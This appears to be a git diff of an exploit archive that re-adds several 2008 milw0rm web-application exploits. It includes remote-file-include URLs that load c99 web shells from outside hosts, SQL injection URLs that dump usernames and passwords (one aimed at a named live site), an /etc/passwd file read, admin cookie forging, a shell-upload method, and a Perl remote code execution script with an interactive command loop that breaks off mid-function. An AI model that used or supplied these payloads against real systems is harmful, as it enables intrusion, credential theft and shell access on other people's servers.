-[!] RoMaNTiC-TeaM Members ...:  Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
-[!] Contact Me ...:                        rxh0@hotmail.com
-
-[!] Background.:                          pSys is a module based PHP Script
-
-[!] Bugs........:                             In Different Files & In Different Variable And Lines
-
-[!] PoC........: 
-
-http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
-http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
-
-[!] Solution...:     Contact With Me I Will Declear All This Fucking Function
-
-[!] Greetingz..:    No One Deserved (Am I Said The Truth ?!!!)
-
-[!] Thx .. :           DNX For Your Exploit I Found This Bugs From Your Exploit  :) 
-
-[!] rXh
-
-[!] bEST wISHES
-
-# milw0rm.com [2008-07-15]
+   ====================================================
+   | pSys v0.7.0 Alpha Multiple Remote File Include   
+   |     (works only with register_globals = on)      
+   |        Founded By rXh RoMaNTiC-TeaM              
+   ====================================================
+
+[!] Discovered.:                           RoMaNcYxHaCkEr
+[!] Vendor.....:                            http://www.powie.de
+[!] My Homepage...:                    WwW.4RxH.CoM
+[!] RoMaNTiC-TeaM Members ...:  Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
+[!] Contact Me ...:                        rxh0@hotmail.com
+
+[!] Background.:                          pSys is a module based PHP Script
+
+[!] Bugs........:                             In Different Files & In Different Variable And Lines
+
+[!] PoC........: 
+
+http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
+http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
+
+[!] Solution...:     Contact With Me I Will Declear All This Fucking Function
+
+[!] Greetingz..:    No One Deserved (Am I Said The Truth ?!!!)
+
+[!] Thx .. :           DNX For Your Exploit I Found This Bugs From Your Exploit  :) 
+
+[!] rXh
+
+[!] bEST wISHES
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6078.txt b/platforms/php/webapps/6078.txt
index 6ed9af682..9ddd20426 100755
--- a/platforms/php/webapps/6078.txt
+++ b/platforms/php/webapps/6078.txt
@@ -1,38 +1,38 @@
-                                         << In The Name Of GOD >>
-
-
-                  -------------------------------------------------------------
-                   -               [ Persian Boys Hacking Team ] -:- 2008
-                   -
-                   - discovered by N3TR00T3R [at] Y! [dot] com
-                   - pragyan 2.6.2 Remote File Includion
-                   - download :http://sourceforge.net/project/showfiles.php?group_id=220286 
-                   - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
-                              r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
-                              Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
-                            [www.Persian-Boys.com] & [www.irchatan.com]
-                  --------------------------------------------------------------
-
-if register_globals = On;
-
-
-Vul Code : [/cms/modules/form.lib.php]
-##########################################################
-#global $sourceFolder;
-#global $moduleFolder;
-#require_once("$sourceFolder/$moduleFolder/form/editform.php");
-#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
-#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
-#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
-#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
-##########################################################
-
-Exploit : 
-
-##########################################################
-#
-# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
-#
-##########################################################
-
-# milw0rm.com [2008-07-15]
+                                         << In The Name Of GOD >>
+
+
+                  -------------------------------------------------------------
+                   -               [ Persian Boys Hacking Team ] -:- 2008
+                   -
+                   - discovered by N3TR00T3R [at] Y! [dot] com
+                   - pragyan 2.6.2 Remote File Includion
+                   - download :http://sourceforge.net/project/showfiles.php?group_id=220286 
+                   - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
+                              r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
+                              Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
+                            [www.Persian-Boys.com] & [www.irchatan.com]
+                  --------------------------------------------------------------
+
+if register_globals = On;
+
+
+Vul Code : [/cms/modules/form.lib.php]
+##########################################################
+#global $sourceFolder;
+#global $moduleFolder;
+#require_once("$sourceFolder/$moduleFolder/form/editform.php");
+#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
+#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
+#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
+#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
+##########################################################
+
+Exploit : 
+
+##########################################################
+#
+# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
+#
+##########################################################
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6079.txt b/platforms/php/webapps/6079.txt
index a3671b42d..e7e4e9d0b 100755
--- a/platforms/php/webapps/6079.txt
+++ b/platforms/php/webapps/6079.txt
@@ -1,102 +1,102 @@
-____________________   ___ ___ ________
-\_   _____/\_   ___ \ /   |   \\_____  \  
- |    __)_ /    \  \//    ~    \/   |   \ 
- |        \\     \___\    Y    /    |    \
-/_______  / \______  /\___|_  /\_______  /
-        \/         \/       \/         \/ 
-
-                                        .OR.ID
-ECHO_ADV_100$2008
-
------------------------------------------------------------------------------------------
-[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
------------------------------------------------------------------------------------------
-
-Author       : M.Hasran Addahroni
-Date         : July, 14 th 2008
-Location     : Jakarta, Indonesia
-Web          : http://e-rdc.org/v1/news.php?readmore=102
-Critical Lvl : Medium
-Impact       : System access
-Where        : From Remote
----------------------------------------------------------------------------
-
-Affected software description:
-~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-Application : Comdev Web Blogger
-version     : <= 4.1.3
-Vendor      : http://www.comdevweb.com/blogger.php
-Description :
-
-Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
-Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
-the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs, 
-Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
-Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with 
-CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
-sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders • 
-Installation Support available
-
----------------------------------------------------------------------------
-
-Vulnerability:
-~~~~~~~~~~~~~
-
-Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used 
-in an sql query.
-This can be exploited thru the browser to manipulate SQL queries and pull the username and password
-from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
-
-
-Poc/Exploit:
-~~~~~~~~~
-
-http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
-http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
-
-Admin Login at http://www.example.com/[PATH]/oneadmin/
-
-Dork:
-~~~~
-Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
-
-
-Solution:
-~~~~~~
-
-- Edit the source code to ensure that input is properly verified.
-- Turn on magic_quotes in php.ini
-
-
-Timeline:
-~~~~~~~~
-
-- 11 - 07 - 2008 bug found
-- 11 - 07 - 2008 vendor contacted
-- 14 - 07 - 2008 advisory released
----------------------------------------------------------------------------
-
-Shoutz:
-~~~~
-~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
-~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
-the_hydra,neng chika, str0ke
-~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
-~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
-super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
-~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
-kuntua, stev_manado,nofry,k1tk4t,0pt1c
-~ newbie_hacker@yahoogroups.com
-~ #aikmel #e-c-h-o @irc.dal.net
-
----------------------------------------------------------------------------
-Contact:
-~~~~~
-
-K-159 || echo|staff || eufrato[at]gmail[dot]com
-Homepage: http://www.e-rdc.org/
-
--------------------------------- [ EOF ] ---------------------------------- 
-
-# milw0rm.com [2008-07-15]
+____________________   ___ ___ ________
+\_   _____/\_   ___ \ /   |   \\_____  \  
+ |    __)_ /    \  \//    ~    \/   |   \ 
+ |        \\     \___\    Y    /    |    \
+/_______  / \______  /\___|_  /\_______  /
+        \/         \/       \/         \/ 
+
+                                        .OR.ID
+ECHO_ADV_100$2008
+
+-----------------------------------------------------------------------------------------
+[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
+-----------------------------------------------------------------------------------------
+
+Author       : M.Hasran Addahroni
+Date         : July, 14 th 2008
+Location     : Jakarta, Indonesia
+Web          : http://e-rdc.org/v1/news.php?readmore=102
+Critical Lvl : Medium
+Impact       : System access
+Where        : From Remote
+---------------------------------------------------------------------------
+
+Affected software description:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Application : Comdev Web Blogger
+version     : <= 4.1.3
+Vendor      : http://www.comdevweb.com/blogger.php
+Description :
+
+Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
+Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
+the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs, 
+Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
+Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with 
+CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
+sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders • 
+Installation Support available
+
+---------------------------------------------------------------------------
+
+Vulnerability:
+~~~~~~~~~~~~~
+
+Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used 
+in an sql query.
+This can be exploited thru the browser to manipulate SQL queries and pull the username and password
+from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
+
+
+Poc/Exploit:
+~~~~~~~~~
+
+http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
+http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
+
+Admin Login at http://www.example.com/[PATH]/oneadmin/
+
+Dork:
+~~~~
+Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
+
+
+Solution:
+~~~~~~
+
+- Edit the source code to ensure that input is properly verified.
+- Turn on magic_quotes in php.ini
+
+
+Timeline:
+~~~~~~~~
+
+- 11 - 07 - 2008 bug found
+- 11 - 07 - 2008 vendor contacted
+- 14 - 07 - 2008 advisory released
+---------------------------------------------------------------------------
+
+Shoutz:
+~~~~
+~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
+~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
+the_hydra,neng chika, str0ke
+~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
+~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,
+super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
+~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,cR4SH3R,
+kuntua, stev_manado,nofry,k1tk4t,0pt1c
+~ newbie_hacker@yahoogroups.com
+~ #aikmel #e-c-h-o @irc.dal.net
+
+---------------------------------------------------------------------------
+Contact:
+~~~~~
+
+K-159 || echo|staff || eufrato[at]gmail[dot]com
+Homepage: http://www.e-rdc.org/
+
+-------------------------------- [ EOF ] ---------------------------------- 
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6080.txt b/platforms/php/webapps/6080.txt
index ac2986180..8041ff01a 100755
--- a/platforms/php/webapps/6080.txt
+++ b/platforms/php/webapps/6080.txt
@@ -1,36 +1,36 @@
-#####################################################
-# Author : BeyazKurt
-# Contact : Djm-sut@Hotmail.Com
-#
-# Script : php Help Agent (v1.1 Full & 1.0)
-# Risk : Local File Include
-# Download : http://sourceforge.net/projects/phphelpagent/
-#
-# File : include/head_chat.inc.php
-#
-# Code :
-# 
-#
-# Exploit :
-#
-#  Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
-#
-# /* Hack Is Not Crime! */
-# -------------------------------
-#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-#                      Proud 2 Be ALBANIAN
-#                      4Ever FENERBAHÇE (H)
-#
-# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
-# Not : Fuck off pala! aq lameri.
-#
-# Thnx : All Muslims Albanian & Turkish Coder..
-# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
-#
-#######################################################
-
-# milw0rm.com [2008-07-15]
+#####################################################
+# Author : BeyazKurt
+# Contact : Djm-sut@Hotmail.Com
+#
+# Script : php Help Agent (v1.1 Full & 1.0)
+# Risk : Local File Include
+# Download : http://sourceforge.net/projects/phphelpagent/
+#
+# File : include/head_chat.inc.php
+#
+# Code :
+# 
+#
+# Exploit :
+#
+#  Vuln.Com/include/head_chat.inc.php?content=../../../../etc/passwd
+#
+# /* Hack Is Not Crime! */
+# -------------------------------
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#                      Proud 2 Be ALBANIAN
+#                      4Ever FENERBAHÇE (H)
+#
+# Z0ne-H gicik v1 is public :D (Download NetkabuS.CoM)
+# Not : Fuck off pala! aq lameri.
+#
+# Thnx : All Muslims Albanian & Turkish Coder..
+# Thnx : dArkSAnqelSu | anladin sen onu anladin... :)
+#
+#######################################################
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6081.txt b/platforms/php/webapps/6081.txt
index bc5d02402..02cdee36e 100755
--- a/platforms/php/webapps/6081.txt
+++ b/platforms/php/webapps/6081.txt
@@ -1,44 +1,44 @@
-  ############################################################################################
-  #                                                                                          #
-  #      ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::....   #           
-  ############################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
-
-& all virangar members & all hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal)
--------
-DESCRIPTION:
-Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
----
-vuln code in /Admin/index.php:
-
-if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
-top();
-menu();
-echo $wellcome_admin;
-foot();
-}
-
----
-exploit:
-javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
------
-now visit /admin and  you can get admin access and manage the cms ;)
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-07-15]
+  ############################################################################################
+  #                                                                                          #
+  #      ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::....   #           
+  ############################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
+
+& all virangar members & all hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal)
+-------
+DESCRIPTION:
+Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+---
+vuln code in /Admin/index.php:
+
+if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
+top();
+menu();
+echo $wellcome_admin;
+foot();
+}
+
+---
+exploit:
+javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
+-----
+now visit /admin and  you can get admin access and manage the cms ;)
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6082.txt b/platforms/php/webapps/6082.txt
index 9679990c9..d26f2b409 100755
--- a/platforms/php/webapps/6082.txt
+++ b/platforms/php/webapps/6082.txt
@@ -1,50 +1,50 @@
-vBulletin PhotoPost vBGallery v2.x Remote File Upload
-
-Found by : Cold z3ro
-
-e-mail : exploiter@hackteach.org
-
-Home page : www.Hack.ps
-
-==============================
-
-exploit usage : 
-
-http://localhost/Forum/$gallery_path/upload.php
-
-here the exploiter can upload php shell via this script
-
-by renamed it's name to $name.php.wmv
-
-but first he should be a user in the forum
-
-thats so important to him cus the uploaded file will be
-
-in his account nomber folder .
-
-example :
-
-user : Cold z3ro
-http://www.hackteach.org/cc/member.php?u=4
-
-his account nomber is 4 as shown in link ,
-
-the uploaded file ( shell ) will be in
-
-http://localhost/Forum/$gallery_path/files/4/$name.php.wmv
-
-id the user Cold z3ro have acconut nomber as example ( 12345 )
-
-the file path is 
-
-http://localhost/Forum/$gallery_path/files/1/2/3/4/5/$name.php.wmv
-
-===================
-
-i want tho thank all members in www.hackteach.org forums , best work u are done.
-
-thank u .
-
-# hackteach.org
-
-# milw0rm.com [2008-07-15]
+vBulletin PhotoPost vBGallery v2.x Remote File Upload
+
+Found by : Cold z3ro
+
+e-mail : exploiter@hackteach.org
+
+Home page : www.Hack.ps
+
+==============================
+
+exploit usage : 
+
+http://localhost/Forum/$gallery_path/upload.php
+
+here the exploiter can upload php shell via this script
+
+by renamed it's name to $name.php.wmv
+
+but first he should be a user in the forum
+
+thats so important to him cus the uploaded file will be
+
+in his account nomber folder .
+
+example :
+
+user : Cold z3ro
+http://www.hackteach.org/cc/member.php?u=4
+
+his account nomber is 4 as shown in link ,
+
+the uploaded file ( shell ) will be in
+
+http://localhost/Forum/$gallery_path/files/4/$name.php.wmv
+
+id the user Cold z3ro have acconut nomber as example ( 12345 )
+
+the file path is 
+
+http://localhost/Forum/$gallery_path/files/1/2/3/4/5/$name.php.wmv
+
+===================
+
+i want tho thank all members in www.hackteach.org forums , best work u are done.
+
+thank u .
+
+# hackteach.org
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6084.txt b/platforms/php/webapps/6084.txt
index d0c761d00..2ddf9c15a 100755
--- a/platforms/php/webapps/6084.txt
+++ b/platforms/php/webapps/6084.txt
@@ -1,42 +1,42 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## Hockeystats Online V BASIC & ADVANCED ( index.php opt )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRiAN Arab HACkErS
-########################
-########################
-##
-## -[[: L!VE DEMO :]]-
-##
-##  [[BASIC VERSION]]    www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
-##                       www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
-##
-## [[ADVANCED VERSION]]  www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
-##                       www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
-########################
-########################
--[[ NOTE ]]-
-1 ) In the first exploite you you need set the real id  ?opt=viewpage&type=html&id=-< real id >'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
-2 ) Download [[Basic version]] code from here ;D   http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-15]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## Hockeystats Online V BASIC & ADVANCED ( index.php opt )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRiAN Arab HACkErS
+########################
+########################
+##
+## -[[: L!VE DEMO :]]-
+##
+##  [[BASIC VERSION]]    www.thehockeystop.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
+##                       www.thehockeystop.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
+##
+## [[ADVANCED VERSION]]  www.thehockeystop.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
+##                       www.thehockeystop.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
+########################
+########################
+-[[ NOTE ]]-
+1 ) In the first exploite you you need set the real id  ?opt=viewpage&type=html&id=-< real id >'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
+2 ) Download [[Basic version]] code from here ;D   http://www.thehockeystop.com/site/downloads/HSO_basic/HockeySTATS_Basic.zip
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: milw0rm :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-15]
diff --git a/platforms/php/webapps/6085.pl b/platforms/php/webapps/6085.pl
index 5a9ebc6d3..17bbca862 100755
--- a/platforms/php/webapps/6085.pl
+++ b/platforms/php/webapps/6085.pl
@@ -1,438 +1,438 @@
-#!/usr/bin/perl 
-#inphex
-#PHPizabi v0.848b C1 HFP1 Remote Code Execution
-#http://www.dz-secure.com/tools/1/WebESploit.pl.txt
-#if you are seeking for a partner to work on some project(s) just send an email inphex0 [ at ] gmail [ dot ] com
-#system/v_cron_proc.php
-#	if (!function_exists("writeLogEntry")) {
-#		function writeLogEntry($data) {
-#			global $CONF;
-#			
-#			touch($CONF["CRON_LOGFILE"]);
-#		
-#			if ($handle = fopen($CONF["CRON_LOGFILE"], "a")) {
-#				fwrite($handle, "[".date($CONF["LOCALE_LONG_DATE_TIME"])."] $data \n");
-#				fclose($handle);
-#			}
-#		}
-#	}
-#
-#
-#writeLogEntry("Cron cycle started");
-#writeLogEntry("Cron cycle ended");
-########################################################
-#overwritable:
-#1.$CONF["CRON_LOGFILE"]
-#2.$CONF["LOCALE_LONG_DATE_TIME"]
-#
-#date($CONF["LOCALE_LONG_DATE_TIME"]) ;\
-#solution:
-#
-#returns: pm
-#
-#returns: a
-#seems logically eh?
-#
-#usage: perl ye.pl host /path/
-#
-## [C:\]# perl ye.pl host /path/
-## $[host]# id
-## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)
-#
-use LWP::UserAgent;
-use HTTP::Cookies;
-use Switch;
-
-$hy = shift;
-$host_ = "http://".$hy;
-$path_ = shift;
-$port = 80; #default
-$info{'info'} = { 
-	"description" => [""],
-	"options" =>
-	{
-		"agent" => "",  
-		"proxy" => "",  
-		"default_headers" => [  
-			["key","value"]], 
-		"timeout" => 0, 
-		"cookie" =>     
-		{
-			"cookie" => [""],
-		},
-	},
-	"sending_options" =>
-	{
-			"host" => $host_, 
-			"path" => $path_."system/v_cron_proc.php",
-		        "port" => $port,                  
-			"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",  
-			"attack" =>
-		{
-				"CONF[CRON_LOGFILE]" => ["get","CONF[CRON_LOGFILE]","yeee.php"],
-				"CONF[LOCALE_LONG_DATE_TIME]" => ["get","CONF[LOCALE_LONG_DATE_TIME]",""], #nice eh?:)
-		},
-	},
-
-};
-
-&start($info{'info'},222);
-while () {
-	print "\$[".$hy."]#";
-	$cmd = ;chomp($cmd);
-	$info{'info'} = { 
-		"description" => [""],
-		"options" =>
-			{
-			"agent" => "",  
-			"proxy" => "",  
-			"default_headers" => [  
-				["key","value"]], 
-			"timeout" => 0, 
-			"cookie" =>     
-			{
-				"cookie" => [""],
-			},
-		},
-		"sending_options" =>
-		{
-				"host" => $host_, 
-				"path" => $path_."system/yeee.php",
-			    "port" => $port,                  
-				"method_a" => "REMOTE_CO(MMAND)/CODE EXECUTION",  
-				"attack" =>
-			{
-					"CONF[CRON_LOGFILE]" => ["get","cmd",$cmd],
-			},
-		},
-
-	};
-
-&start($info{'info'},221); 
-print ${$info{'info'}}{221}{'content'}."\n";
-}
-sub start
-{
-	
-	$a_ = shift;
-	$id = shift;
-	$post_dA = "";
